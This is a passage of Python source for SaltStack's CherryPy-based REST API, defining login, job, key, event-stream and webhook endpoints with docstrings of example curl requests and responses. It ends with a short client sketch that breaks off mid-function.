\\ -d arg='/path/to/dir' # Sending posiitonal args and Keyword args with JSON: echo '[ { "client": "local", "tgt": "*", "fun": "cmd.run", "arg": [ "du -sh .", "/path/to/dir" ], "kwarg": { "shell": "/bin/sh", "template": "jinja" } } ]' | curl -sSik https://localhost:8000 \\ -H 'Content-type: application/json' \\ -d@- # Calling runner functions: curl -sSik https://localhost:8000 \\ -d client=runner \\ -d fun='jobs.lookup_jid' \\ -d jid='20150129182456704682' \\ -d outputter=highstate # Calling wheel functions: curl -sSik https://localhost:8000 \\ -d client=wheel \\ -d fun='key.gen_accept' \\ -d id_=dave \\ -d keysize=4096 ''' return { 'return': list(self.exec_lowstate( token=cherrypy.session.get('token'))) } class Minions(LowDataAdapter): ''' Convenience URLs for working with minions ''' _cp_config = dict(LowDataAdapter._cp_config, **{ 'tools.salt_token.on': True, 'tools.salt_auth.on': True, }) def GET(self, mid=None): ''' A convenience URL for getting lists of minions or getting minion details .. http:get:: /minions/(mid) :reqheader X-Auth-Token: |req_token| :reqheader Accept: |req_accept| :status 200: |200| :status 401: |401| :status 406: |406| **Example request:** .. code-block:: bash curl -i localhost:8000/minions/ms-3 .. code-block:: http GET /minions/ms-3 HTTP/1.1 Host: localhost:8000 Accept: application/x-yaml **Example response:** .. code-block:: http HTTP/1.1 200 OK Content-Length: 129005 Content-Type: application/x-yaml return: - ms-3: grains.items: ... ''' cherrypy.request.lowstate = [{ 'client': 'local', 'tgt': mid or '*', 'fun': 'grains.items', }] return { 'return': list(self.exec_lowstate( token=cherrypy.session.get('token'))), } def POST(self, **kwargs): ''' Start an execution command and immediately return the job id .. http:post:: /minions :reqheader X-Auth-Token: |req_token| :reqheader Accept: |req_accept| :reqheader Content-Type: |req_ct| :resheader Content-Type: |res_ct| :status 200: |200| :status 401: |401| :status 406: |406| :term:`lowstate` data describing Salt commands must be sent in the request body. The ``client`` option will be set to :py:meth:`~salt.client.LocalClient.local_async`. **Example request:** .. code-block:: bash curl -sSi localhost:8000/minions \\ -H "Accept: application/x-yaml" \\ -d tgt='*' \\ -d fun='status.diskusage' .. code-block:: http POST /minions HTTP/1.1 Host: localhost:8000 Accept: application/x-yaml Content-Length: 26 Content-Type: application/x-www-form-urlencoded tgt=*&fun=status.diskusage **Example response:** .. code-block:: http HTTP/1.1 202 Accepted Content-Length: 86 Content-Type: application/x-yaml return: - jid: '20130603122505459265' minions: [ms-4, ms-3, ms-2, ms-1, ms-0] _links: jobs: - href: /jobs/20130603122505459265 ''' job_data = list(self.exec_lowstate(client='local_async', token=cherrypy.session.get('token'))) cherrypy.response.status = 202 return { 'return': job_data, '_links': { 'jobs': [{'href': '/jobs/{0}'.format(i['jid'])} for i in job_data if i], }, } class Jobs(LowDataAdapter): _cp_config = dict(LowDataAdapter._cp_config, **{ 'tools.salt_token.on': True, 'tools.salt_auth.on': True, }) def GET(self, jid=None, timeout=''): ''' A convenience URL for getting lists of previously run jobs or getting the return from a single job .. http:get:: /jobs/(jid) List jobs or show a single job from the job cache. :status 200: |200| :status 401: |401| :status 406: |406| **Example request:** .. code-block:: bash curl -i localhost:8000/jobs .. 
code-block:: http GET /jobs HTTP/1.1 Host: localhost:8000 Accept: application/x-yaml **Example response:** .. code-block:: http HTTP/1.1 200 OK Content-Length: 165 Content-Type: application/x-yaml return: - '20121130104633606931': Arguments: - '3' Function: test.fib Start Time: 2012, Nov 30 10:46:33.606931 Target: jerry Target-type: glob **Example request:** .. code-block:: bash curl -i localhost:8000/jobs/20121130104633606931 .. code-block:: http GET /jobs/20121130104633606931 HTTP/1.1 Host: localhost:8000 Accept: application/x-yaml **Example response:** .. code-block:: http HTTP/1.1 200 OK Content-Length: 73 Content-Type: application/x-yaml info: - Arguments: - '3' Function: test.fib Minions: - jerry Start Time: 2012, Nov 30 10:46:33.606931 Target: '*' Target-type: glob User: saltdev jid: '20121130104633606931' return: - jerry: - - 0 - 1 - 1 - 2 - 6.9141387939453125e-06 ''' lowstate = [{ 'client': 'runner', 'fun': 'jobs.lookup_jid' if jid else 'jobs.list_jobs', 'jid': jid, }] if jid: lowstate.append({ 'client': 'runner', 'fun': 'jobs.list_job', 'jid': jid, }) cherrypy.request.lowstate = lowstate job_ret_info = list(self.exec_lowstate( token=cherrypy.session.get('token'))) ret = {} if jid: job_ret, job_info = job_ret_info ret['info'] = [job_info] else: job_ret = job_ret_info[0] ret['return'] = [job_ret] return ret class Keys(LowDataAdapter): ''' Convenience URLs for working with minion keys .. versionadded:: 2014.7.0 These URLs wrap the functionality provided by the :py:mod:`key wheel module <salt.wheel.key>` functions. ''' def GET(self, mid=None): ''' Show the list of minion keys or detail on a specific key .. versionadded:: 2014.7.0 .. http:get:: /keys/(mid) List all keys or show a specific key :status 200: |200| :status 401: |401| :status 406: |406| **Example request:** .. code-block:: bash curl -i localhost:8000/keys .. code-block:: http GET /keys HTTP/1.1 Host: localhost:8000 Accept: application/x-yaml **Example response:** .. code-block:: http HTTP/1.1 200 OK Content-Length: 165 Content-Type: application/x-yaml return: local: - master.pem - master.pub minions: - jerry minions_pre: [] minions_rejected: [] **Example request:** .. code-block:: bash curl -i localhost:8000/keys/jerry .. code-block:: http GET /keys/jerry HTTP/1.1 Host: localhost:8000 Accept: application/x-yaml **Example response:** .. code-block:: http HTTP/1.1 200 OK Content-Length: 73 Content-Type: application/x-yaml return: minions: jerry: 51:93:b3:d0:9f:3a:6d:e5:28:67:c2:4b:27:d6:cd:2b ''' self._cp_config['tools.salt_token.on'] = True if mid: lowstate = [{ 'client': 'wheel', 'fun': 'key.finger', 'match': mid, }] else: lowstate = [{ 'client': 'wheel', 'fun': 'key.list_all', }] cherrypy.request.lowstate = lowstate result = self.exec_lowstate(token=cherrypy.session.get('token')) return {'return': next(result, {}).get('data', {}).get('return', {})} def POST(self, mid, keysize=None, force=None, **kwargs): r''' Easily generate keys for a minion and auto-accept the new key .. versionadded:: 2014.7.0 Example partial kickstart script to bootstrap a new minion: .. code-block:: text %post mkdir -p /etc/salt/pki/minion curl -sSk https://localhost:8000/keys \ -d mid=jerry \ -d username=kickstart \ -d password=kickstart \ -d eauth=pam \ | tar -C /etc/salt/pki/minion -xf - mkdir -p /etc/salt/minion.d printf 'master: 10.0.0.5\nid: jerry' > /etc/salt/minion.d/id.conf %end .. http:post:: /keys Generate a public and private key and return both as a tarball Authentication credentials must be passed in the request. 
:status 200: |200| :status 401: |401| :status 406: |406| **Example request:** .. code-block:: bash curl -sSk https://localhost:8000/keys \ -d mid=jerry \ -d username=kickstart \ -d password=kickstart \ -d eauth=pam \ -o jerry-salt-keys.tar .. code-block:: http POST /keys HTTP/1.1 Host: localhost:8000 **Example response:** .. code-block:: http HTTP/1.1 200 OK Content-Length: 10240 Content-Disposition: attachment; filename="saltkeys-jerry.tar" Content-Type: application/x-tar jerry.pub0000644000000000000000000000070300000000000010730 0ustar 00000000000000 ''' self._cp_config['tools.hypermedia_out.on'] = False self._cp_config['tools.sessions.on'] = False lowstate = [{ 'client': 'wheel', 'fun': 'key.gen_accept', 'id_': mid, }] if keysize: lowstate[0]['keysize'] = keysize if force: lowstate[0]['force'] = force lowstate[0].update(kwargs) cherrypy.request.lowstate = lowstate result = self.exec_lowstate() ret = next(result, {}).get('data', {}).get('return', {}) pub_key = ret.get('pub', '') pub_key_file = tarfile.TarInfo('minion.pub') pub_key_file.size = len(pub_key) priv_key = ret.get('priv', '') priv_key_file = tarfile.TarInfo('minion.pem') priv_key_file.size = len(priv_key) fileobj = StringIO.StringIO() tarball = tarfile.open(fileobj=fileobj, mode='w') tarball.addfile(pub_key_file, StringIO.StringIO(pub_key)) tarball.addfile(priv_key_file, StringIO.StringIO(priv_key)) tarball.close() headers = cherrypy.response.headers headers['Content-Disposition'] = 'attachment; filename="saltkeys-{0}.tar"'.format(mid) headers['Content-Type'] = 'application/x-tar' headers['Content-Length'] = fileobj.len headers['Cache-Control'] = 'no-cache' fileobj.seek(0) return fileobj class Login(LowDataAdapter): ''' Log in to receive a session token :ref:`Authentication information <rest_cherrypy-auth>`. ''' def __init__(self, *args, **kwargs): super(Login, self).__init__(*args, **kwargs) self.auth = salt.auth.Resolver(self.opts) def GET(self): ''' Present the login interface .. http:get:: /login An explanation of how to log in. :status 200: |200| :status 401: |401| :status 406: |406| **Example request:** .. code-block:: bash curl -i localhost:8000/login .. code-block:: http GET /login HTTP/1.1 Host: localhost:8000 Accept: text/html **Example response:** .. code-block:: http HTTP/1.1 200 OK Content-Type: text/html ''' cherrypy.response.headers['WWW-Authenticate'] = 'Session' return { 'status': cherrypy.response.status, 'return': "Please log in", } def POST(self, **kwargs): ''' :ref:`Authenticate <rest_cherrypy-auth>` against Salt's eauth system .. http:post:: /login :reqheader X-Auth-Token: |req_token| :reqheader Accept: |req_accept| :reqheader Content-Type: |req_ct| :form eauth: the eauth backend configured for the user :form username: username :form password: password :status 200: |200| :status 401: |401| :status 406: |406| **Example request:** .. code-block:: bash curl -si localhost:8000/login \\ -H "Accept: application/json" \\ -d username='saltuser' \\ -d password='saltpass' \\ -d eauth='pam' .. code-block:: http POST / HTTP/1.1 Host: localhost:8000 Content-Length: 42 Content-Type: application/x-www-form-urlencoded Accept: application/json username=saltuser&password=saltpass&eauth=pam **Example response:** .. 
code-block:: http HTTP/1.1 200 OK Content-Type: application/json Content-Length: 206 X-Auth-Token: 6d1b722e Set-Cookie: session_id=6d1b722e; expires=Sat, 17 Nov 2012 03:23:52 GMT; Path=/ {"return": { "token": "6d1b722e", "start": 1363805943.776223, "expire": 1363849143.776224, "user": "saltuser", "eauth": "pam", "perms": [ "grains.*", "status.*", "sys.*", "test.*" ] }} ''' if not self.api._is_master_running(): raise salt.exceptions.SaltDaemonNotRunning( 'Salt Master is not available.') # the urlencoded_processor will wrap this in a list if isinstance(cherrypy.serving.request.lowstate, list): creds = cherrypy.serving.request.lowstate[0] else: creds = cherrypy.serving.request.lowstate token = self.auth.mk_token(creds) if 'token' not in token: raise cherrypy.HTTPError(401, 'Could not authenticate using provided credentials') cherrypy.response.headers['X-Auth-Token'] = cherrypy.session.id cherrypy.session['token'] = token['token'] cherrypy.session['timeout'] = (token['expire'] - token['start']) / 60 # Grab eauth config for the current backend for the current user try: eauth = self.opts.get('external_auth', {}).get(token['eauth'], {}) if 'groups' in token: user_groups = set(token['groups']) eauth_groups = set([i.rstrip('%') for i in eauth.keys() if i.endswith('%')]) perms = [] for group in user_groups & eauth_groups: perms.extend(eauth['{0}%'.format(group)]) perms = perms or None else: perms = eauth.get(token['name'], eauth.get('*')) if perms is None: raise ValueError("Eauth permission list not found.") except (AttributeError, IndexError, KeyError, ValueError): logger.debug("Configuration for external_auth malformed for " "eauth '{0}', and user '{1}'." .format(token.get('eauth'), token.get('name')), exc_info=True) raise cherrypy.HTTPError(500, 'Configuration for external_auth could not be read.') return {'return': [{ 'token': cherrypy.session.id, 'expire': token['expire'], 'start': token['start'], 'user': token['name'], 'eauth': token['eauth'], 'perms': perms, }]} class Logout(LowDataAdapter): ''' Class to remove or invalidate sessions ''' _cp_config = dict(LowDataAdapter._cp_config, **{ 'tools.salt_token.on': True, 'tools.salt_auth.on': True, 'tools.lowdata_fmt.on': False, }) def POST(self): ''' Destroy the currently active session and expire the session cookie ''' cherrypy.lib.sessions.expire() # set client-side to expire cherrypy.session.regenerate() # replace server-side with new return {'return': "Your token has been cleared"} class Run(LowDataAdapter): ''' Class to run commands without normal session handling ''' _cp_config = dict(LowDataAdapter._cp_config, **{ 'tools.sessions.on': False, }) def POST(self, **kwargs): ''' Run commands bypassing the :ref:`normal session handling <rest_cherrypy-auth>` .. http:post:: /run This entry point is primarily for "one-off" commands. Each request must pass full Salt authentication credentials. Otherwise this URL is identical to the :py:meth:`root URL (/) <LowDataAdapter.POST>`. :term:`lowstate` data describing Salt commands must be sent in the request body. :status 200: |200| :status 401: |401| :status 406: |406| **Example request:** .. code-block:: bash curl -sS localhost:8000/run \\ -H 'Accept: application/x-yaml' \\ -d client='local' \\ -d tgt='*' \\ -d fun='test.ping' \\ -d username='saltdev' \\ -d password='saltdev' \\ -d eauth='pam' .. 
code-block:: http POST /run HTTP/1.1 Host: localhost:8000 Accept: application/x-yaml Content-Length: 75 Content-Type: application/x-www-form-urlencoded client=local&tgt=*&fun=test.ping&username=saltdev&password=saltdev&eauth=pam **Example response:** .. code-block:: http HTTP/1.1 200 OK Content-Length: 73 Content-Type: application/x-yaml return: - ms-0: true ms-1: true ms-2: true ms-3: true ms-4: true The /run enpoint can also be used to issue commands using the salt-ssh subsystem. When using salt-ssh, eauth credentials should not be supplied. Instad, authentication should be handled by the SSH layer itself. The use of the salt-ssh client does not require a salt master to be running. Instead, only a roster file must be present in the salt configuration directory. All SSH client requests are synchronous. ** Example SSH client request:** .. code-block:: bash curl -sS localhost:8000/run \\ -H 'Accept: application/x-yaml' \\ -d client='ssh' \\ -d tgt='*' \\ -d fun='test.ping' .. code-block:: http POST /run HTTP/1.1 Host: localhost:8000 Accept: application/x-yaml Content-Length: 75 Content-Type: application/x-www-form-urlencoded client=ssh&tgt=*&fun=test.ping **Example SSH response:** .. code-block:: http return: - silver: fun: test.ping fun_args: [] id: silver jid: '20141203103525666185' retcode: 0 return: true success: true ''' return { 'return': list(self.exec_lowstate()), } class Events(object): ''' Expose the Salt event bus The event bus on the Salt master exposes a large variety of things, notably when executions are started on the master and also when minions ultimately return their results. This URL provides a real-time window into a running Salt infrastructure. .. seealso:: :ref:`events` ''' exposed = True _cp_config = dict(LowDataAdapter._cp_config, **{ 'response.stream': True, 'tools.encode.encoding': 'utf-8', # Auth handled manually below 'tools.salt_token.on': True, 'tools.salt_auth.on': False, 'tools.hypermedia_in.on': False, 'tools.hypermedia_out.on': False, }) def __init__(self): self.opts = cherrypy.config['saltopts'] self.resolver = salt.auth.Resolver(self.opts) def _is_valid_token(self, auth_token): ''' Check if this is a valid salt-api token or valid Salt token salt-api tokens are regular session tokens that tie back to a real Salt token. Salt tokens are tokens generated by Salt's eauth system. :return bool: True if valid, False if not valid. ''' if auth_token is None: return False # First check if the given token is in our session table; if so it's a # salt-api token and we need to get the Salt token from there. orig_sesion, _ = cherrypy.session.cache.get(auth_token, ({}, None)) # If it's not in the session table, assume it's a regular Salt token. salt_token = orig_sesion.get('token', auth_token) # The eauth system does not currently support perms for the event # stream, so we're just checking if the token exists not if the token # allows access. if salt_token and self.resolver.get_token(salt_token): return True return False def GET(self, token=None, salt_token=None): r''' An HTTP stream of the Salt master event bus This stream is formatted per the Server Sent Events (SSE) spec. Each event is formatted as JSON. .. http:get:: /events :status 200: |200| :status 401: |401| :status 406: |406| :query token: **optional** parameter containing the token ordinarily supplied via the X-Auth-Token header in order to allow cross-domain requests in browsers that do not include CORS support in the EventSource API. 
E.g., ``curl -NsS localhost:8000/events?token=308650d`` :query salt_token: **optional** parameter containing a raw Salt *eauth token* (not to be confused with the token returned from the /login URL). E.g., ``curl -NsS localhost:8000/events?salt_token=30742765`` **Example request:** .. code-block:: bash curl -NsS localhost:8000/events .. code-block:: http GET /events HTTP/1.1 Host: localhost:8000 **Example response:** Note, the ``tag`` field is not part of the spec. SSE compliant clients should ignore unknown fields. This addition allows non-compliant clients to only watch for certain tags without having to deserialze the JSON object each time. .. code-block:: http HTTP/1.1 200 OK Connection: keep-alive Cache-Control: no-cache Content-Type: text/event-stream;charset=utf-8 retry: 400 tag: salt/job/20130802115730568475/new data: {'tag': 'salt/job/20130802115730568475/new', 'data': {'minions': ['ms-4', 'ms-3', 'ms-2', 'ms-1', 'ms-0']}} tag: salt/job/20130802115730568475/ret/jerry data: {'tag': 'salt/job/20130802115730568475/ret/jerry', 'data': {'jid': '20130802115730568475', 'return': True, 'retcode': 0, 'success': True, 'cmd': '_return', 'fun': 'test.ping', 'id': 'ms-1'}} The event stream can be easily consumed via JavaScript: .. code-block:: javascript var source = new EventSource('/events'); source.onopen = function() { console.debug('opening') }; source.onerror = function(e) { console.debug('error!', e) }; source.onmessage = function(e) { console.debug('Tag: ', e.data.tag) console.debug('Data: ', e.data.data) }; Or using CORS: .. code-block:: javascript var source = new EventSource('/events?token=ecd589e4e01912cf3c4035afad73426dbb8dba75', {withCredentials: true}); It is also possible to consume the stream via the shell. Records are separated by blank lines; the ``data:`` and ``tag:`` prefixes will need to be removed manually before attempting to unserialize the JSON. curl's ``-N`` flag turns off input buffering which is required to process the stream incrementally. Here is a basic example of printing each event as it comes in: .. code-block:: bash curl -NsS localhost:8000/events |\ while IFS= read -r line ; do echo $line done Here is an example of using awk to filter events based on tag: .. 
code-block:: bash curl -NsS localhost:8000/events |\ awk ' BEGIN { RS=""; FS="\\n" } $1 ~ /^tag: salt\/job\/[0-9]+\/new$/ { print $0 } ' tag: salt/job/20140112010149808995/new data: {"tag": "salt/job/20140112010149808995/new", "data": {"tgt_type": "glob", "jid": "20140112010149808995", "tgt": "jerry", "_stamp": "2014-01-12_01:01:49.809617", "user": "shouse", "arg": [], "fun": "test.ping", "minions": ["jerry"]}} tag: 20140112010149808995 data: {"tag": "20140112010149808995", "data": {"fun_args": [], "jid": "20140112010149808995", "return": true, "retcode": 0, "success": true, "cmd": "_return", "_stamp": "2014-01-12_01:01:49.819316", "fun": "test.ping", "id": "jerry"}} ''' cookies = cherrypy.request.cookie auth_token = token or salt_token or ( cookies['session_id'].value if 'session_id' in cookies else None) if not self._is_valid_token(auth_token): raise cherrypy.HTTPError(401) # Release the session lock before starting the long-running response cherrypy.session.release_lock() cherrypy.response.headers['Content-Type'] = 'text/event-stream' cherrypy.response.headers['Cache-Control'] = 'no-cache' cherrypy.response.headers['Connection'] = 'keep-alive' def listen(): ''' An iterator to yield Salt events ''' event = salt.utils.event.get_event( 'master', sock_dir=self.opts['sock_dir'], transport=self.opts['transport'], opts=self.opts) stream = event.iter_events(full=True) yield u'retry: {0}\n'.format(400) while True: data = next(stream) yield u'tag: {0}\n'.format(data.get('tag', '')) yield u'data: {0}\n\n'.format(json.dumps(data)) return listen() class WebsocketEndpoint(object): ''' Open a WebSocket connection to Salt's event bus The event bus on the Salt master exposes a large variety of things, notably when executions are started on the master and also when minions ultimately return their results. This URL provides a real-time window into a running Salt infrastructure. Uses websocket as the transport mechanism. .. seealso:: :ref:`events` ''' exposed = True _cp_config = dict(LowDataAdapter._cp_config, **{ 'response.stream': True, 'tools.encode.encoding': 'utf-8', # Auth handled manually below 'tools.salt_token.on': True, 'tools.salt_auth.on': False, 'tools.hypermedia_in.on': False, 'tools.hypermedia_out.on': False, 'tools.websocket.on': True, 'tools.websocket.handler_cls': websockets.SynchronizingWebsocket, }) def __init__(self): self.opts = cherrypy.config['saltopts'] self.auth = salt.auth.LoadAuth(self.opts) def GET(self, token=None, **kwargs): ''' Return a websocket connection of Salt's event stream .. http:get:: /ws/(token) :query format_events: The event stream will undergo server-side formatting if the ``format_events`` URL parameter is included in the request. This can be useful to avoid formatting on the client-side: .. code-block:: bash curl -NsS <...snip...> localhost:8000/ws?format_events :reqheader X-Auth-Token: an authentication token from :py:class:`~Login`. :status 101: switching to the websockets protocol :status 401: |401| :status 406: |406| **Example request:** curl -NsSk \\ -H 'X-Auth-Token: ffedf49d' \\ -H 'Host: localhost:8000' \\ -H 'Connection: Upgrade' \\ -H 'Upgrade: websocket' \\ -H 'Origin: https://localhost:8000' \\ -H 'Sec-WebSocket-Version: 13' \\ -H 'Sec-WebSocket-Key: '"$(echo -n $RANDOM | base64)" \\ localhost:8000/ws .. code-block:: http GET /ws HTTP/1.1 Connection: Upgrade Upgrade: websocket Host: localhost:8000 Origin: https://localhost:8000 Sec-WebSocket-Version: 13 Sec-WebSocket-Key: s65VsgHigh7v/Jcf4nXHnA== X-Auth-Token: ffedf49d **Example response**: .. 
code-block:: http HTTP/1.1 101 Switching Protocols Upgrade: websocket Connection: Upgrade Sec-WebSocket-Accept: mWZjBV9FCglzn1rIKJAxrTFlnJE= Sec-WebSocket-Version: 13 An authentication token **may optionally** be passed as part of the URL for browsers that cannot be configured to send the authentication header or cookie: .. code-block:: bash curl -NsS <...snip...> localhost:8000/ws/ffedf49d The event stream can be easily consumed via JavaScript: .. code-block:: javascript // Note, you must be authenticated! var source = new Websocket('ws://localhost:8000/ws/d0ce6c1a'); source.onerror = function(e) { console.debug('error!', e); }; source.onmessage = function(e) { console.debug(e.data); }; source.send('websocket client ready') source.close(); Or via Python, using the Python module `websocket-client <https://pypi.python.org/pypi/websocket-client/>`_ for example. .. code-block:: python # Note, you must be authenticated! from websocket import create_connection ws = create_connection('ws://localhost:8000/ws/d0ce6c1a') ws.send('websocket client ready') # Look at https://pypi.python.org/pypi/websocket-client/ for more # examples. while listening_to_events: print ws.recv() ws.close() Above examples show how to establish a websocket connection to Salt and activating real time updates from Salt's event stream by signaling ``websocket client ready``. ''' # Pulling the session token from an URL param is a workaround for # browsers not supporting CORS in the EventSource API. if token: orig_sesion, _ = cherrypy.session.cache.get(token, ({}, None)) salt_token = orig_sesion.get('token') else: salt_token = cherrypy.session.get('token') # Manually verify the token if not salt_token or not self.auth.get_tok(salt_token): raise cherrypy.HTTPError(401) # Release the session lock before starting the long-running response cherrypy.session.release_lock() # A handler is the server side end of the websocket connection. Each # request spawns a new instance of this handler handler = cherrypy.request.ws_handler def event_stream(handler, pipe): ''' An iterator to return Salt events (and optionally format them) ''' # blocks until send is called on the parent end of this pipe. pipe.recv() event = salt.utils.event.get_event( 'master', sock_dir=self.opts['sock_dir'], transport=self.opts['transport'], opts=self.opts) stream = event.iter_events(full=True) SaltInfo = event_processor.SaltInfo(handler) while True: data = next(stream) if data: try: # work around try to decode catch unicode errors if 'format_events' in kwargs: SaltInfo.process(data, salt_token, self.opts) else: handler.send('data: {0}\n\n'.format( json.dumps(data)), False) except UnicodeDecodeError: logger.error( "Error: Salt event has non UTF-8 data:\n{0}" .format(data)) time.sleep(0.1) parent_pipe, child_pipe = Pipe() handler.pipe = parent_pipe handler.opts = self.opts # Process to handle async push to a client. # Each GET request causes a process to be kicked off. proc = Process(target=event_stream, args=(handler, child_pipe)) proc.start() class Webhook(object): ''' A generic web hook entry point that fires an event on Salt's event bus External services can POST data to this URL to trigger an event in Salt. For example, Amazon SNS, Jenkins-CI or Travis-CI, or GitHub web hooks. .. note:: Be mindful of security Salt's Reactor can run any code. A Reactor SLS that responds to a hook event is responsible for validating that the event came from a trusted source and contains valid data. 
**This is a generic interface and securing it is up to you!** This URL requires authentication however not all external services can be configured to authenticate. For this reason authentication can be selectively disabled for this URL. Follow best practices -- always use SSL, pass a secret key, configure the firewall to only allow traffic from a known source, etc. The event data is taken from the request body. The :mailheader:`Content-Type` header is respected for the payload. The event tag is prefixed with ``salt/netapi/hook`` and the URL path is appended to the end. For example, a ``POST`` request sent to ``/hook/mycompany/myapp/mydata`` will produce a Salt event with the tag ``salt/netapi/hook/mycompany/myapp/mydata``. The following is an example ``.travis.yml`` file to send notifications to Salt of successful test runs: .. code-block:: yaml language: python script: python -m unittest tests after_success: - | curl -sSk https://saltapi-url.example.com:8000/hook/travis/build/success \ -d branch="${TRAVIS_BRANCH}" \ -d commit="${TRAVIS_COMMIT}" .. seealso:: :ref:`events`, :ref:`reactor` ''' exposed = True tag_base = ['salt', 'netapi', 'hook'] _cp_config = dict(LowDataAdapter._cp_config, **{ # Don't do any lowdata processing on the POST data 'tools.lowdata_fmt.on': True, # Auth can be overridden in __init__(). 'tools.salt_token.on': True, 'tools.salt_auth.on': True, }) def __init__(self): self.opts = cherrypy.config['saltopts'] self.event = salt.utils.event.get_event( 'master', sock_dir=self.opts['sock_dir'], transport=self.opts['transport'], opts=self.opts, listen=False) if cherrypy.config['apiopts'].get('webhook_disable_auth'): self._cp_config['tools.salt_token.on'] = False self._cp_config['tools.salt_auth.on'] = False def POST(self, *args, **kwargs): ''' Fire an event in Salt with a custom event tag and data .. http:post:: /hook :status 200: |200| :status 401: |401| :status 406: |406| :status 413: request body is too large **Example request:** .. code-block:: bash curl -sS localhost:8000/hook -d foo='Foo!' -d bar='Bar!' .. code-block:: http POST /hook HTTP/1.1 Host: localhost:8000 Content-Length: 16 Content-Type: application/x-www-form-urlencoded foo=Foo&bar=Bar! **Example response**: .. code-block:: http HTTP/1.1 200 OK Content-Length: 14 Content-Type: application/json {"success": true} As a practical example, an internal continuous-integration build server could send an HTTP POST request to the URL ``https://localhost:8000/hook/mycompany/build/success`` which contains the result of a build and the SHA of the version that was built as JSON. That would then produce the following event in Salt that could be used to kick off a deployment via Salt's Reactor:: Event fired at Fri Feb 14 17:40:11 2014 ************************* Tag: salt/netapi/hook/mycompany/build/success Data: {'_stamp': '2014-02-14_17:40:11.440996', 'headers': { 'X-My-Secret-Key': 'F0fAgoQjIT@W', 'Content-Length': '37', 'Content-Type': 'application/json', 'Host': 'localhost:8000', 'Remote-Addr': '127.0.0.1'}, 'post': {'revision': 'aa22a3c4b2e7', 'result': True}} Salt's Reactor could listen for the event: .. code-block:: yaml reactor: - 'salt/netapi/hook/mycompany/build/*': - /srv/reactor/react_ci_builds.sls And finally deploy the new build: .. 
code-block:: yaml {% set secret_key = data.get('headers', {}).get('X-My-Secret-Key') %} {% set build = data.get('post', {}) %} {% if secret_key == 'F0fAgoQjIT@W' and build.result == True %} deploy_my_app: cmd.state.sls: - tgt: 'application*' - arg: - myapp.deploy - kwarg: pillar: revision: {{ revision }} {% endif %} ''' tag = '/'.join(itertools.chain(self.tag_base, args)) data = cherrypy.serving.request.unserialized_data raw_body = cherrypy.serving.request.raw_body headers = dict(cherrypy.request.headers) ret = self.event.fire_event({ 'body': raw_body, 'post': data, 'headers': headers, }, tag) return {'success': ret} class Stats(object): ''' Expose statistics on the running CherryPy server ''' exposed = True _cp_config = dict(LowDataAdapter._cp_config, **{ 'tools.salt_token.on': True, 'tools.salt_auth.on': True, }) def GET(self): ''' Return a dump of statistics collected from the CherryPy server .. http:get:: /stats :reqheader X-Auth-Token: |req_token| :reqheader Accept: |req_accept| :resheader Content-Type: |res_ct| :status 200: |200| :status 401: |401| :status 406: |406| ''' if hasattr(logging, 'statistics'): return cpstats.extrapolate_statistics(logging.statistics) return {} class App(object): ''' Class to serve HTML5 apps ''' exposed = True def GET(self, *args): ''' Serve a single static file ignoring the remaining path This is useful in combination with a browser-based app using the HTML5 history API. .. http::get:: /app :reqheader X-Auth-Token: |req_token| :status 200: |200| :status 401: |401| ''' apiopts = cherrypy.config['apiopts'] return cherrypy.lib.static.serve_file(apiopts['app']) class API(object): ''' Collect configuration and URL map for building the CherryPy app ''' url_map = { 'index': LowDataAdapter, 'login': Login, 'logout': Logout, 'minions': Minions, 'run': Run, 'jobs': Jobs, 'keys': Keys, 'events': Events, 'stats': Stats, } def _setattr_url_map(self): ''' Set an attribute on the local instance for each key/val in url_map CherryPy uses class attributes to resolve URLs. ''' for url, cls in six.iteritems(self.url_map): setattr(self, url, cls()) def _update_url_map(self): ''' Assemble any dynamic or configurable URLs ''' if HAS_WEBSOCKETS: self.url_map.update({ 'ws': WebsocketEndpoint, }) # Allow the Webhook URL to be overridden from the conf. self.url_map.update({ self.apiopts.get('webhook_url', 'hook').lstrip('/'): Webhook, }) # Enable the single-page JS app URL. 
if 'app' in self.apiopts: self.url_map.update({ self.apiopts.get('app_path', 'app').lstrip('/'): App, }) def __init__(self): self.opts = cherrypy.config['saltopts'] self.apiopts = cherrypy.config['apiopts'] self._update_url_map() self._setattr_url_map() def get_conf(self): ''' Combine the CherryPy configuration with the rest_cherrypy config values pulled from the master config and return the CherryPy configuration ''' conf = { 'global': { 'server.socket_host': self.apiopts.get('host', '0.0.0.0'), 'server.socket_port': self.apiopts.get('port', 8000), 'server.thread_pool': self.apiopts.get('thread_pool', 100), 'server.socket_queue_size': self.apiopts.get('queue_size', 30), 'engine.timeout_monitor.on': self.apiopts.get( 'expire_responses', True), 'max_request_body_size': self.apiopts.get( 'max_request_body_size', 1048576), 'debug': self.apiopts.get('debug', False), }, '/': { 'request.dispatch': cherrypy.dispatch.MethodDispatcher(), 'tools.trailing_slash.on': True, 'tools.gzip.on': True, 'tools.cpstats.on': self.apiopts.get('collect_stats', False), 'tools.html_override.on': True, 'tools.cors_tool.on': True, }, } if 'favicon' in self.apiopts: conf['/favicon.ico'] = { 'tools.staticfile.on': True, 'tools.staticfile.filename': self.apiopts['favicon'], } if self.apiopts.get('debug', False) is False: conf['global']['environment'] = 'production' # Serve static media if the directory has been set in the configuration if 'static' in self.apiopts: conf[self.apiopts.get('static_path', '/static')] = { 'tools.staticdir.on': True, 'tools.staticdir.dir': self.apiopts['static'], } # Add to global config cherrypy.config.update(conf['global']) return conf def get_app(opts): ''' Returns a WSGI app and a configuration dictionary ''' apiopts = opts.get(__name__.rsplit('.', 2)[-2], {}) # rest_cherrypy opts # Add Salt and salt-api config options to the main CherryPy config dict cherrypy.config['saltopts'] = opts cherrypy.config['apiopts'] = apiopts root = API() # cherrypy app cpyopts = root.get_conf() # cherrypy app opts return root, apiopts, cpyopts
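# --- Illustrative sketch (not part of app.py above) ---
# A minimal, hedged client for the rest_cherrypy interface documented above:
# POST to /login to obtain a session token, then send a lowstate command to the
# root URL with the X-Auth-Token header, mirroring the curl examples in the
# docstrings. The URL, credentials and eauth backend are placeholders, and
# `verify=False` only mirrors the self-signed-certificate examples; a real
# deployment should verify the certificate.
import requests

API_URL = 'https://localhost:8000'  # hypothetical salt-api endpoint
CREDS = {'username': 'saltdev', 'password': 'saltdev', 'eauth': 'pam'}


def login(session):
    resp = session.post(API_URL + '/login', json=CREDS, verify=False,
                        headers={'Accept': 'application/json'})
    resp.raise_for_status()
    # Login.POST returns {'return': [{'token': ..., 'expire': ..., ...}]}
    return resp.json()['return'][0]['token']


def run_test_ping(session, token):
    # Lowstate is always a list of dicts, one per command.
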